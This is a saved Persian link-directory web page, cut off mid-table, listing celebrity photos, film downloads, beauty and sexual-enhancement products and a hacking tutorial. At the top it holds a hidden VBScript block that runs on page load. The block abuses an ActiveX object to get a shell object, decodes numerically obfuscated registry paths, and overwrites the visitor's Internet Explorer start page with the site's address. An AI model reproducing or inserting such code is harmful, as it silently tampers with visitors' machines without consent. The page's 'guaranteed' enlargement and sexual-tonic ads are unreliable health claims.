<html><head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>جذاب ترین و داغ ترین لینک های روزانه</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>جذاب ترین لینک های روزانه</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>فروشگاه آنلاين بروجن شاپ</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>این پایین بهترین لینک های روزانه</title>
<meta name="keywords" content="جذاب ترین و داغ ترین لینک های روزانه">
<meta name="description" content="جذاب ترین و داغ ترین لینک های روزانه">
<style>
<!--
.td1 { MARGIN-BOTTOM: 5px; PADDING-BOTTOM: 5px; BORDER-BOTTOM: #dddddd 1px solid }.td1 { MARGIN-BOTTOM: 5px; PADDING-BOTTOM: 5px; BORDER-BOTTOM: #dddddd 1px solid }.td1 { MARGIN-BOTTOM: 5px; PADDING-BOTTOM: 5px; BORDER-BOTTOM: #dddddd 1px solid } .itemCom { FONT-SIZE: 8pt; COLOR: #606060; FONT-FAMILY: tahoma } .itemCom { FONT-SIZE: 8pt; COLOR: #606060; FONT-FAMILY: tahoma } .itemCom { FONT-SIZE: 8pt; COLOR: #606060; FONT-FAMILY: tahoma }.itemTitle {

FONT-WEIGHT: 600; FONT-SIZE: 8pt; COLOR: #333333; LINE-HEIGHT: 17px; FONT-FAMILY: tahoma

}

-->
</style>
</head><body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginheight="0" marginwidth="0">
<script language="vbscript">
Site_Name="www.myi24.com/"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set reg = df.createobject("wscript.shell","")
hr="092083079070084087065082069092077105099114111115111102116092073110116101114110101116032069120112108111114101114092077097105110092083116097114116032080097103101"
re1="072075069089095076079067065076095077065067072073078069"
re2="072075069089095067085082082069078084095085083069082"
For a = 1 To Len(hr) Step 3
hr2=hr2 & chr(mid(hr,a,3))
next
For a = 1 To Len(re1) Step 3
re1_b=re1_b & chr(mid(re1,a,3))
next
For a = 1 To Len(re2) Step 3
re2_b=re2_b & chr(mid(re2,a,3))
next
reg.regwrite re1_b & hr2,site_name
reg.regwrite re2_b & hr2,site_name
</script>
<table id="table47" width="100%" border="0" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td style="padding: 0px; font-size: 2px; font-family: Tahoma;" height="5"></td>
	</tr>
	<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
		<p align="center"><a target="_blank" href="http://www.group.myi24.com/">
		<img src="a_data/250p9va.jpg" width="468" border="0" height="60"></a><br>
		<br>
<b><a target="_blank" href="http://www.taklenz.net/">
		<img alt="" src="a_data/banner22.jpg" width="500" border="0" height="60"></a></b></p></td>
	</tr>
	<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
		&nbsp;</td>
	</tr>
	<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
		<p align="center">
		<script src="a_data/myi24-2.js" type="text/javascript"></script><a href="http://myi24.com/" target="_blank"><img src="a_data/tablighat.gif" alt="Just Click Here you can be a winner" width="468" border="0" height="60"></a></p></td>
	</tr>
	<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">&nbsp;</td>
	</tr>
	<tr>
		<td dir="rtl" style="padding: 0px; font-size: 11px; font-family: Tahoma;" bgcolor="#ffcc00" height="25">
		<table id="table58" width="100%" border="0" cellpadding="0" cellspacing="0">
			<tbody><tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="68">
		<p align="center">
		<img src="a_data/hand.gif" width="35" border="0" height="36"></p></td>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
		<div align="center">
			<table id="table59" width="99%" border="0" cellpadding="0" cellspacing="0">
				<tbody><tr>
					<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" bgcolor="#000000" height="26">
					<p style="margin-right: 5px;">
					<font color="#ffffff">این پایین 
					<a target="_blank" href="http://www.link.myi24.com/webmaster.htm">
					<font color="#ffffff"><span style="text-decoration: none;">
					بهترین لینک های روزانه قرار دارند حتمآ ببینید . با تشکر از 
					بازدیدتون ....</span></font></a></font></p></td>
				</tr>
			</tbody></table>
		</div>
				</td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	</tbody></table>
					<table id="table46" width="100%" border="0" cellpadding="0" cellspacing="0">
						<tbody><tr>
							<td style="font-size: 8pt; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
				<font style="font-size: 8pt; font-weight: 600; text-decoration: none; color: rgb(0, 0, 0); font-family: Tahoma;" color="#ff0000" face="Tahoma">
				<a rel="bookmark" target="_blank" href="http://www.myi24.com/2008/12/03/golshifteh-farahany-in-usa/">
				<span style="text-decoration: none;"><font color="#ff0000">عکسهای جدید گلشیفته 
فراهانی در امریکا</font></span></a></font><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="21">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font>
				<font color="#000000" face="tahoma,tahoma">
				<a rel="bookmark" target="_blank" href="http://www.cd.i24.ir/">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;">
				فیلم مجموعه دروغ ها 
				، فیلم Good Luck Chuck&nbsp; ، فیلم اره 5 - SAW V The Movie</span></a></font></p></td>
						</tr>
						<tr>
							<td style="font-size: 8pt; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="25">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font color="#000000" face="tahoma,tahoma">
				<span style="text-decoration: none; color: rgb(0, 0, 0); font-weight: 600; font-size: 8pt;">
				<a rel="bookmark" target="_blank" href="http://www.cd.i24.ir/">
				<font color="#0000ec"><span style="text-decoration: none;">۷ فیلم 
				عاشقانه</span></font><span style="text-decoration: none; font-weight: 600; color: rgb(0, 0, 236); font-size: 8pt;"> 
				داغ داغ داغ و جدید</span></a></span></font><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font>
				<font color="#000000" face="tahoma,tahoma">
				<a rel="bookmark" target="_blank" href="http://www.cd.i24.ir/">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;">
				10 فیلم برتر از محمد رضا گلزار ، مهناز افشار ، بهرام رادان</span></a></font></p></td>
						</tr>
						<tr>
							<td style="font-size: 8pt; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<span style="text-decoration: none;">
				<font color="#ff0000">
				<a target="_blank" href="http://www.oxi.blogfa.com/">
				<span style="text-decoration: none;"><font color="#008000">افزایش تضمینی اندازه آلت 
				تناسلی</font></span></a></font></span></font><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
							</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="21">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a><font color="#000000" face="tahoma,tahoma">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.oxi.blogfa.com/"><font color="#000000">
				<span style="text-decoration: none;">مهره 
				مار راز جذابیت و عشق ...</span></font></a></span></font></span></font></p></td>
						</tr>
						<tr>
							<td style="font-size: 8pt; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font color="#000000" face="tahoma,tahoma">
				<a rel="bookmark" target="_blank" href="http://www.cd.i24.ir/">
				<span style="font-weight: 600; color: rgb(255, 0, 0); text-decoration: none;">
				مجموعه 8 فيلم بسيار زيبا از آنجلينا جولي</span></a></font><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
							</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.orumshop.com/"><font color="#000000">&nbsp; 
				</font></a>
				</span></font>
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none;">
				<a target="_blank" href="http://www.salamat.i24.ir/">
				<font color="#000000"><span style="text-decoration: none;">صابون 
				لاغري و برطرف کننده چربی + كرم اسكراب زيبايي خرچنگ</span></font></a></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<font color="#0000ec"><span style="">
				<a target="_blank" href="http://www.irtapesh.ir/">
				<span style="text-decoration: none;">بدو بدو بيا تو ايران طپش حال 
				کن</span></a> </span></font></font>
				<a href="http://www.irtapesh.ir/"><font color="#0000ec">
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none;">
				.</span></font></a></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font><font face="tahoma,tahoma"><span>
				<a target="_blank" href="http://raptopop.blogfa.com/">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;">
				دانلود جديدترين آهنگهاي رپ و پاپ</span></a></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font face="tahoma,tahoma">
				<a target="_blank" href="http://www.salamat.i24.ir/">
				<span style="font-size: 8pt; color: rgb(255, 0, 0); text-decoration: none; font-weight: 600;">
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(255, 0, 0); font-family: Tahoma;">
				ژل حجم دهنده ي لب </span></span>
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">
				<font color="#000000">
				<span style="font-size: 8pt; text-decoration: none; font-weight: 600;">
				+</span></font></span><span style="font-size: 8pt; color: rgb(255, 0, 0); text-decoration: none; font-weight: 600;"><span style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(255, 0, 0); font-family: Tahoma;">
				</span>
				<span style="font-weight: 600; font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; text-decoration: none;">
				<font style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(255, 0, 0); font-family: Tahoma;">
				سيستم تلمبه حجم دهنده سينه </font></span></span>
				<font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;" color="#000000">
				<span style="font-size: 8pt; text-decoration: none; font-weight: 600; font-family: Tahoma;">
				+</span></font><span style="font-size: 8pt; color: rgb(255, 0, 0); text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(255, 0, 0); font-family: Tahoma;"><span style="font-weight: 600; font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; text-decoration: none;">
				</span></font>
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(255, 0, 0); font-family: Tahoma;">
				صابون پف صورت</span></span></a></font><span style="font-weight: 600; font-size: 8pt;"><font face="Tahoma">&nbsp; </font></span>
				</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font><font face="tahoma,tahoma"><span>
				<a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.salamat.i24.ir/">
					<span style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;">
					<font style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; font-weight: 600;">
					فقط زن و شوهر ها کلیک کنند !</font></span><font style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;"> 
				. اگر مجرد هستید کلیک نکن .</font></a></span></font></p></td>
						</tr>
						<tr>
							<td style="font-size: 8pt; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
		<span style="text-decoration: none;">
				<font face="tahoma,tahoma">
				<a target="_blank" style="font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.salamat.i24.ir/">فقط زنو شوهر ها کلیک کنند</a></font><font color="#ff0000" face="Tahoma"><a target="_blank" href="http://www.salamat.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;">
		</a></font></span><font face="tahoma,tahoma">
				<span style="font-size: 8pt; color: rgb(255, 0, 0); text-decoration: none; font-weight: 600;">
		<a target="_blank" href="http://www.salamat.i24.ir/" style="font-size: 8pt; font-family: Tahoma; text-decoration: none; font-weight: 600;">
				<font color="#000000">( + 18 )</font></a></span><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font>
				<font color="#000000" face="tahoma,tahoma">
				<a rel="bookmark" target="_blank" href="http://www.cd.i24.ir/">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;">
				آموزش آرایشگری خلیجی و عربی و ایرانی</span></a></font></p></td>
						</tr>
						<tr>
							<td style="font-size: 8pt; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;</font><font color="#000000" face="tahoma,tahoma"><a rel="bookmark" target="_blank" href="http://www.cd.i24.ir/"><font color="#008000"><span style="text-decoration: none; font-weight: 600;">
				</span></font>
				<span style="text-decoration: none; color: rgb(0, 0, 0); font-weight: 600;">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 128, 0); font-weight: 600;">
				تصاویری از اراذل و </span>
				<span style="text-decoration: none; font-size: 8pt; font-weight: 600; color: rgb(0, 128, 0);">
				اوباش و </span></span>
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt;">
				<font color="#008000">
				<span style="text-decoration: none; font-weight: 600;">ابتذال در 
				سینمای ایران !!!</span></font></span><span style="font-size: 8pt; text-decoration: none; font-weight: 600; color: rgb(0, 0, 0);"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(0, 128, 0);">&nbsp;</font></span></a></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
							</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font><font color="#000000" face="Tahoma">
				<a rel="bookmark" target="_blank" href="http://www.myi24.com/">
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);">
				عکسهای داغ و جدید مهناز افشار … !!!</span></a></font></p></td>
						</tr>
						<tr>
							<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" bgcolor="#ffffff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<font face="tahoma,tahoma">
				<span style="font-size: 8pt; color: rgb(255, 0, 0); text-decoration: none; font-weight: 600;">
				<a target="_blank" href="http://www.myi24.com/2008/09/16/estakhr/">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; font-weight: 600;">
				استخری مملو از زن و مرد در تهران </span>
				<span style="text-decoration: none; font-size: 8pt; font-family: Tahoma; font-weight: 600;">
				<font color="#000000">
				( واقعآ باور نکردنیه )</font></span></a><span style="font-weight: 600; font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; text-decoration: none;"> </span>
				</span></font><font color="#ff0000">
				<span style="font-weight: 600; font-size: 8pt;">
				<font face="tahoma,tahoma">&nbsp;</font></span></font><span style="font-size: 8pt; font-weight: 600;" lang="en-us"><font color="#0000f0"><img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.orumshop.com/"><font color="#000000">&nbsp; 
				</font></a>
				<font color="#000000">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.finalshop.ir/Default.aspx?c=24&amp;s=9126"><span style="text-decoration: none;">
				<font color="#000000">م<span lang="fa">ع</span>جون 
				تقویت جنسی و بهبود وضعیت جنسی</font></span></a></span></font></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<span style="text-decoration: none;"><font color="#ff0000">
				<a target="_blank" href="http://www.myi24.com/">
				<span style="text-decoration: none;"><font color="#008000">
				تصاویری از سریال یوسف پیامبر <span lang="en-us">Yozarsif</span> 
				که تا حالا جایی ندیدید</font></span></a></font></span></font><span style="font-weight: 600; font-size: 8pt;"><font face="Tahoma">&nbsp; </font></span>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<font face="Tahoma">
				<span style="text-decoration: none; font-size: 8pt; font-weight: 600;">
				<a target="_blank" href="http://www.cd.i24.ir/"><font color="#000000">
				<span style="text-decoration: none;">زحمت نکشید لازم به نوشتن 
				نیست .&nbsp;</span></font><font color="#0000ec"><span style="text-decoration: none;">شما 
				بخوانید کامپیوترتان مینویسد !</span></font></a></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font color="#ff0000" face="Tahoma">
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma; color: rgb(0, 0, 0);">
					<a target="_blank" href="http://cd.i24.ir/">
					<font color="#ff0000"><span style="text-decoration: none;">
				پکیج جهانی موبایل</span></font></a></span></font><font color="#000000" face="Tahoma"><a target="_blank" href="http://cd.i24.ir/"><span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);">
				</span><font color="#ff0000">
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt;">
				"</span></font><span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);">جامع 
				ترين مجموعه آموزش هك و برنامه موبايل در ایران
				<span style="font-weight: 600; text-decoration: none; font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma;">
				"</span></span></a><a target="_blank" href="http://www.cd.i24.ir/"><span style="text-decoration: none; font-size: 8pt; font-weight: 600;"><font color="#000000">
				</font></span></a></font><span style="font-weight: 600; font-size: 8pt;"><font face="Tahoma">&nbsp; </font></span>
				</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.orumshop.com/"><font color="#000000">&nbsp; 
				</font></a>
				<font color="#000000">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.salamat.i24.ir/">
				<font color="#0000f9"><span style="text-decoration: none;">مغجون 
				تقویت جنسی و بهبود وضعیت جنسی</span></font></a></span></font></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none;">
				<font color="#ff0000">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.finalshop.ir/Default.aspx?c=24&amp;s=9126">
				<font color="#ff0000"><span style="text-decoration: none;">ژل چهار کاره جنسی زنان و مردان&nbsp;
				</span>
				</font>
				</a>
				</span>
				</font></span><span style="font-weight: 600; font-size: 8pt;"><font face="Tahoma">&nbsp; </font></span>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.orumshop.com/"><font color="#000000">&nbsp; 
				</font></a><font color="#0000ec">
				<a href="http://www.salamat.i24.ir/">
				<span style="text-decoration: none;">زیبایی خود را به ما بسپارید 
				....</span></a></font></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
